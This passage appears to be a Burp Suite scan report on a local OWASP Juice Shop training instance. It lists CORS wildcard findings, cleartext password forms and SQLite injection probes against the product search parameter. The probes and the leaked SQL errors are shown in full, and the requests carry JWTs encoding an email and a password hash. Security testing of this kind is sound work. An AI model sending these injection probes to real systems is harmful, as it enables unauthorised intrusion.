Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://jdofgaapvhxo.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 20
ETag: W/"14-7sFzBTJmHd4ipuzu+uHz+Q"
Date: Sun, 15 Jan 2017 21:22:22 GMT
Connection: close

{"version":"2.20.0"}
2.73. http://192.168.61.143:3000/rest/basket/4
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/basket/4

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://phmpuvfudzqj.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/basket/4 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg; email=mike_landeck%40hotmail.com
DNT: 1
Connection: close
Origin: http://phmpuvfudzqj.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 153
ETag: W/"99-axOzVV99lvE3JynBcKuo6Q"
Date: Sun, 15 Jan 2017 21:45:29 GMT
Connection: close

{"status":"success","data":{"id":4,"coupon":null,"createdAt":"2017-01-15T21:44:54.000Z","updatedAt":"2017-01-15T21:45:28.000Z","UserId":7,"products":[]}}
2.74. http://192.168.61.143:3000/rest/basket/4/checkout
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/basket/4/checkout

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://rmrpxqvmkxdl.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/basket/4/checkout HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://rmrpxqvmkxdl.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Date: Sun, 15 Jan 2017 21:22:26 GMT
Connection: close
Content-Length: 2010

<html>
<head>
<meta charset='utf-8'>
<title>UnauthorizedError: No authorization token was found</title>
<style>* {
margin: 0;
padding: 0;
outline: 0;
}

body {
padding: 80px 100
...[SNIP]...
2.75. http://192.168.61.143:3000/rest/product/search
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/product/search

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://myujkfojcrkp.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/product/search?q=orange HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://myujkfojcrkp.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 282
ETag: W/"11a-02U7qfvsMA/pfm4fo5BHdg"
Date: Sun, 15 Jan 2017 21:40:40 GMT
Connection: close

{"status":"success","data":[{"id":2,"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"image":"orange_juice.jpg","createdAt":"2017-01-15 21:
...[SNIP]...
2.76. http://192.168.61.143:3000/rest/user/login
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/user/login

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://tbacmsxbvjgj.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/user/login HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://tbacmsxbvjgj.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Date: Sun, 15 Jan 2017 21:22:43 GMT
Connection: close
Content-Length: 1942

<html>
<head>
<meta charset='utf-8'>
<title>Error: Unexpected path: /rest/user/login</title>
<style>* {
margin: 0;
padding: 0;
outline: 0;
}

body {
padding: 80px 100px;
font:
...[SNIP]...
2.77. http://192.168.61.143:3000/rest/user/whoami
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/user/whoami

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://nomgzxuirdbb.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/user/whoami HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://nomgzxuirdbb.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 43
ETag: W/"2b-FMn/4uFOBvpEHr18dhkCVQ"
Date: Sun, 15 Jan 2017 21:13:17 GMT
Connection: close

{"id":7,"email":"mike_landeck@hotmail.com"}
3. Cleartext submission of password
Previous  Next

There are 3 instances of this issue:

Issue background

Some applications transmit passwords over unencrypted connections, making them vulnerable to interception. To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.



3.1. http://192.168.61.143:3000/dist/juice-shop.min.js
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /dist/juice-shop.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request 1

GET /dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=Ji9iYLhA0a_FezL5AAAA
DNT: 1
Connection: close
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
ETag: W/"10e10-15942f5a540"
Content-Type: application/javascript
Content-Length: 69136
Date: Sun, 15 Jan 2017 21:00:23 GMT
Connection: close

angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
...[SNIP]...
<div>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-info" ng-show="confirmation && !form.$dirty">
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="currentPassword" name="currentPassword" ng-model="currentPassword" required/>\n </div>
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="newPassword" name="newPassword" ng-model="newPassword" required ng-minlength="5" ng-maxlength="20"/>\n </div>
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="newPasswordRepeat" name="newPasswordRepeat" ng-model="newPasswordRepeat" required/>\n </div>
...[SNIP]...
3.2. http://192.168.61.143:3000/dist/juice-shop.min.js
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /dist/juice-shop.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request 1

GET /dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=Ji9iYLhA0a_FezL5AAAA
DNT: 1
Connection: close
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
ETag: W/"10e10-15942f5a540"
Content-Type: application/javascript
Content-Length: 69136
Date: Sun, 15 Jan 2017 21:00:23 GMT
Connection: close

angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
...[SNIP]...
</h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="error && !form.$dirty">
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required/>\n </div>
...[SNIP]...
3.3. http://192.168.61.143:3000/dist/juice-shop.min.js
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /dist/juice-shop.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request 1

GET /dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=Ji9iYLhA0a_FezL5AAAA
DNT: 1
Connection: close
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
ETag: W/"10e10-15942f5a540"
Content-Type: application/javascript
Content-Length: 69136
Date: Sun, 15 Jan 2017 21:00:23 GMT
Connection: close

angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
...[SNIP]...
</h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="form.$invalid && form.$dirty">
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required ng-minlength="5" ng-maxlength="20"/>\n </div>
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="userPasswordRepeat" name="userPasswordRepeat" ng-model="user.passwordRepeat" required/>\n </div>
...[SNIP]...
4. Interesting input handling: SQLite injection
Previous  Next

There are 2 instances of this issue:

4.1. http://192.168.61.143:3000/rest/product/search [q parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.61.143:3000
Path:   /rest/product/search

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

The application reacts to inputs in a way that suggests it might be vulnerable to some kind of server-side code injection. The probes are listed below in chronological order.

Successful probes

Request 1

GET /rest/product/search?q=orangewzjpp8\z`z'z"\&rt9038kw=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:11 GMT
Connection: close
Content-Length: 374

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangewzjpp8\\z`z'z\"\\%' OR description LIKE '%orangewzjpp8\\z`z'z\"\\%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 2

GET /rest/product/search?q=orangeuc1687\`z''z\"\\&mpsy5zzl=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 2

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:08 GMT
Connection: close

{"status":"success","data":[]}

Request 3

GET /rest/product/search?q=orangevi8137\zz'z&vcw2c4xi=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 3

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:15 GMT
Connection: close
Content-Length: 364

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangevi8137\\zz'z%' OR description LIKE '%orangevi8137\\zz'z%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 4

GET /rest/product/search?q=orangelq6h75z\''z&njqpsuv5=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
